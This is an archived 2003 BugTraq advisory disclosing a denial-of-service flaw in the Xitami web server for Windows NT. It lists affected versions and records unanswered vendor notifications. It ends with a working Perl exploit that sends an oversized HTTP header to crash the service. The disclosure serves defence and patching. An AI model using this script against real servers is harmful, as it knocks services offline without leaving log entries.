SecurityFocus BUGTRAQ Mailing List: BugTraqLink Number One Link Number One Link Number Two Link Number Two Link Number One Link Number One Link Number Two Link Number Two Entire Site Advisories Calendar Columnists Elsewhere Guest Feature Infocus Library Links Mailing Lists (all) -- BUGTRAQ -- FOCUS-IDS -- FOCUS-IH -- FOCUS-LINUX -- FOCUS-MS -- FOCUS-SUN -- FOCUS-VIRUS -- FORENSICS -- INCIDENTS -- PEN-TEST -- SEC JOBS -- SF NEWS -- VULN-DEV News Products Services Tools Vulns BUGTRAQ ARCHIVE [ Message Index ] [ Thread Index ][ Reply ] [ prev Msg by Date ][ next Msg by Date ] To: BugTraq Subject: Denial of service vulnerability in Xitami Open Source Web Server Date: Sep 22 2003 12:28PM Author: Oliver Karow Message-ID: <3F6EEAD5.6060604@gmx.de> Denial of service vulnerability in Xitami Open Source Web Server ================================================================ Date: 22.09.2003 ===== Affected Systems ================ The vulnerability was discovered on several versions (production and beta) of Xitami webserver for Windows NT: - Xitami 2.5B4 (bw3225b4.exe) - Xitami 2.5B4 (bs3225b4.exe) - Xitami 2.4D9 (bw3224d9.exe) I did no tests with the other versions and os/platforms (OS/2, Alpha, OpenVMS, Unix). Therfore i can't confirm that the vulnerability exists there. The Problem =========== Xitami is a multiplatform open source web server and the flagship of iMatix. The services crashes when it receives a http get request (to a .shtm file) with a header field of >= 5154 bytes, followed by a ":". Xitami dies due to a Microsoft Visual C++ Runtime Error, an abnormal program termination inside XIWIN32.EXE has occurred. The message is *not* followed by any Win32 exception dialog. Vendor: ======= iMatix was informed about the vulnerability on 04.09.2003 and 05.09.2003 via email. Up to now, i did not receive an answer from iMatix :( You can visit the vendors webpage here: http://www.ximati.com http://www.imatix.com Other Notes =========== Unlike some server crashes, the service process will *not* recover from the crash caused by the attack. Successful exploitation of this vulnerability will NOT be logged, as the service crashes. It seems also not to be clear, what the actual production and beta release versions are. At http://www.xitami.com/download.htm, the current production is 2.4d9 and the current beta is 2.5b5. At the same time, at http://www.imatix.com/html/xitami/index2.htm, the current production is 2.5b4 and the current beta is 2.5b4?!? Author: ======= Oliver Karow (oliver.karow[at]gmx.de) Exploitation ============ #!/usr/local/bin/perl # # Simple exploit for Imatix Xitami Webserver on Windows NT # # Sending a GET request for a *.shtm file with a header field of >= 5154 bytes, followed by a ":", # will crash the service. # # Vulnerable versions: # - Xitami 2.5B4 (bw3225b4.exe) # - Xitami 2.5B4 (bs3225b4.exe) # - Xitami 2.4D9 (bw3224d9.exe) # - others? # # For legal purposes only ! # # 22.09.2003 - Oliver Karow - oliver.karow[AT]gmx.de use IO::Socket; $ip="127.0.0.1"; $port=80; $var="A" x 5157; $mySocket=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5); $mySocket->autoflush(1); print $mySocket "GET /test.shtm HTTP/1.0\r\n". $var.": */*\r\n\r\n"; @answer=<$mySocket>; $length=@answer; if ($length==0){die "\nService killed!\n";} print @answer; Want to link to this message? Use this URL: Disclaimer, Terms & Conditions About this List Featured Lists: ARIS Users bugtraq bugtraq-es bugtraq-french NEW bugtraq-jp firewalls focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics forensics-es honeypots incidents libnet pen-test secevents secpapers secprog sectools secureshell security-basics security-management NEW securityjobs vpn vuln-dev webappsec Newsletters: sf-news ms-secnews linux-secnews [ more . . . ] Privacy Statement Copyright © 1999-2003 SecurityFocus